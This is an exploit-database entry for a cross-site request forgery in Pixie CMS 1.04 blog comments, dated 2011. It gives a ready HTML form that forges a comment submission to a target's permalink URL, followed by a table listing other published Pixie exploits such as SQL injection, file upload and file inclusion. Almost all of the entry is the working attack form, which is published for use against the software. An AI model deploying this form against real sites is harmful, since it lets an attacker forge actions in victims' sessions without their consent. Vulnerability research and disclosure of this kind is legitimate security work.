# Exploit Title: Pixie v1.04 blog post CSRF # Google Dork: # Date: 11-Dec-2011 # Author: hackme # Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip # Version: 1.04# Tested on: Linux Ubuntu 10.10 # CVE : [+] TH4NKZ T0: broiosen,ReGun and hackgame.it [+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post [+] Post Method [+] exploit: <form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post"> name: <input type="Text" name="name" id="name" size="15"/><br> e-mail: <input type="Text" name="email" id="email" size="15"/> <br>web(optional): <input type="Text" name="web" id="web" size="15"/><br> comment: <input type="Text" name="comment" id="comment" size="15"/><br> <input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/> <input type="Hidden" name="post" id="post" value="1"/></form>
Related Exploits
Trying to match OSVDBs (1): 83188Trying to match setup file: 05b69c2e4c334b5a2ceac03d8c402938
Other Possible E-DB Search Terms: Pixie 1.04, Pixie
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2017-04-02 |  |
|
Pixie 1.0.4 - Arbitrary File Upload | rungga_reksya |
| 2010-07-15 | |
|
Pixie 1.0.4 - HTML Injection / Cross-Site Scripting | High-Tech B... |
| 2011-01-20 | |
|
Pixie CMS 1.0.4 - 'admin/index.php' SQL Injection | High-Tech B... |
| 2011-11-14 | |
|
Pixie CMS 1.01 < 1.04 - Blind SQL Injections | Piranha |
| 2010-12-29 | |
|
PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities | Ali Raheem |
| 2009-03-20 | |
|
Pixie CMS - Cross-Site Scripting / SQL Injection | Justin Keane |
| 2009-01-27 | |
|
Pixie CMS 1.0 - Multiple Local File Inclusion | DSecRG |